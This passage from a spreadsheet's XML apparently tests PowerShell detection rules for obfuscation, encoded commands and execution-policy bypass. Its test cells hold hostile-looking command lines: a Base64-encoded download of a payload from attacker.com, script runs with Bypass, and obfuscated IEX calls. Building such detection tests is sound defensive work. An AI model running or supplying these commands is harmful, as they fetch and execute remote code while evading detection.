          <t>powershell.exe -coMMaNd "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1977" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1977" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1977" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1977" s="44" t="n"/>
      <c r="J1977" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1977" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1978" ht="15.75" customHeight="1" s="42">
      <c r="A1978" s="43" t="n"/>
      <c r="B1978" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1978" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1978" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1978" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmanD "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1978" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1978" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1978" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1978" s="44" t="n"/>
      <c r="J1978" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1978" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1979" ht="15.75" customHeight="1" s="42">
      <c r="A1979" s="43" t="n"/>
      <c r="B1979" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1979" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1979" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1979" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1979" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1979" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1979" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1979" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1979" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1979" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1980" ht="15.75" customHeight="1" s="42">
      <c r="A1980" s="43" t="n"/>
      <c r="B1980" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1980" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1980" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1980" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNcOdEdComMAND SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1980" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1980" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1980" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1980" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1980" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1980" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1981" ht="15.75" customHeight="1" s="42">
      <c r="A1981" s="43" t="n"/>
      <c r="B1981" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1981" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1981" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1981" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1981" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1981" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1981" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1981" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1981" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1981" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1982" ht="15.75" customHeight="1" s="42">
      <c r="A1982" s="43" t="n"/>
      <c r="B1982" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1982" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1982" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1982" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcoDeDCoMmANd SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1982" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1982" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1982" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1982" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1982" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1982" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1983" ht="15.75" customHeight="1" s="42">
      <c r="A1983" s="43" t="n"/>
      <c r="B1983" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1983" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1983" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1983" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENCoDEdcoMMaNd SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1983" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1983" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1983" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1983" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1983" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1983" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1984" ht="15.75" customHeight="1" s="42">
      <c r="A1984" s="43" t="n"/>
      <c r="B1984" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1984" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1984" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1984" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNcODeDcOMmANd SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1984" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1984" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1984" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1984" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1984" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1984" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1985" ht="15.75" customHeight="1" s="42">
      <c r="A1985" s="43" t="n"/>
      <c r="B1985" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1985" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1985" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1985" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -encODEDCOMMand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1985" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1985" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1985" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1985" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1985" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1985" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1986" ht="15.75" customHeight="1" s="42">
      <c r="A1986" s="43" t="n"/>
      <c r="B1986" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1986" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1986" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1986" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1986" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1986" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1986" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1986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86" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1986" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1987" ht="15.75" customHeight="1" s="42">
      <c r="A1987" s="43" t="n"/>
      <c r="B1987" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1987" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1987" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1987" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -exeCUtioNpoLicy Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1987" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1987" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1987" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1987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87" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1987" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1988" ht="15.75" customHeight="1" s="42">
      <c r="A1988" s="43" t="n"/>
      <c r="B1988" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1988" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1988" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1988" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXecutIOnPOLIcY Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1988" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1988" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1988" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1988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88" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1988" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1989" ht="15.75" customHeight="1" s="42">
      <c r="A1989" s="43" t="n"/>
      <c r="B1989" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1989" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1989" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1989" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FILE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1989" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1989" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1989" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1989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89" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1989" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1990" ht="15.75" customHeight="1" s="42">
      <c r="A1990" s="43" t="n"/>
      <c r="B1990" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1990" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1990" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1990" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutionPOliCY Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1990" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1990" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1990" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1990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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1990" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1991" ht="15.75" customHeight="1" s="42">
      <c r="A1991" s="43" t="n"/>
      <c r="B1991" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1991" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1991" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1991" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1991" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1991" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1991" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1991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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1991" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1992" ht="15.75" customHeight="1" s="42">
      <c r="A1992" s="43" t="n"/>
      <c r="B1992" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1992" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1992" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1992" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FIle C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1992" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1992" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1992" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1992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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1992" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1993" ht="15.75" customHeight="1" s="42">
      <c r="A1993" s="43" t="n"/>
      <c r="B1993" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1993" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1993" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1993" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1993" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1993" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1993" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1993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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1993" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1994" ht="15.75" customHeight="1" s="42">
      <c r="A1994" s="43" t="n"/>
      <c r="B1994" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1994" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1994" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1994" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FIle C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1994" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1994" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1994" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1994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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1994" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1995" ht="15.75" customHeight="1" s="42">
      <c r="A1995" s="43" t="n"/>
      <c r="B1995" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1995" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1995" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1995" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -fIle C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1995" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1995" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1995" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1995" s="4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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1995" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1996" ht="15.75" customHeight="1" s="42">
      <c r="A1996" s="43" t="n"/>
      <c r="B1996" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1996" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1996" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1996" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -filE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1996" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1996" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1996" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1996" s="44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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1996" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1997" ht="15.75" customHeight="1" s="42">
      <c r="A1997" s="43" t="n"/>
      <c r="B1997" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1997" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1997" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1997" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXecutIONPOLicy Bypass -filE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1997" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1997" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1997" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1997" s="44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997" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1997" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1998" ht="15.75" customHeight="1" s="42">
      <c r="A1998" s="43" t="n"/>
      <c r="B1998" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1998" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1998" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1998" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F1998" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1998" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1998" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1998" s="44" t="n"/>
      <c r="J1998" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1998" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1999" ht="15.75" customHeight="1" s="42">
      <c r="A1999" s="43" t="n"/>
      <c r="B1999" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1999" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1999" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1999" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F1999" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1999" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1999" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1999" s="44" t="n"/>
      <c r="J1999" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1999" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2000" ht="15.75" customHeight="1" s="42">
      <c r="A2000" s="43" t="n"/>
      <c r="B2000" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C2000" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D2000" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E2000" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F2000" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2000" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2000" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2000" s="43" t="n"/>
      <c r="J2000" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2000" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2001" ht="15.75" customHeight="1" s="42">
      <c r="A2001" s="43" t="n"/>
      <c r="B2001" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2001" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2001" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2001" s="4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2001" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2001" s="4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2001" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2001" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2002" ht="15.75" customHeight="1" s="42">
      <c r="A2002" s="43" t="n"/>
      <c r="B2002" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2002" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2002" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2002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2002" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2002" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2002" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2002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002" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2002" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2003" ht="15.75" customHeight="1" s="42">
      <c r="A2003" s="43" t="n"/>
      <c r="B2003" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2003" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2003" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2003" s="4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2003" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2003" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2003" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2003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003" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2003" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2004" ht="15.75" customHeight="1" s="42">
      <c r="A2004" s="43" t="n"/>
      <c r="B2004" s="44" t="inlineStr">
        <is>
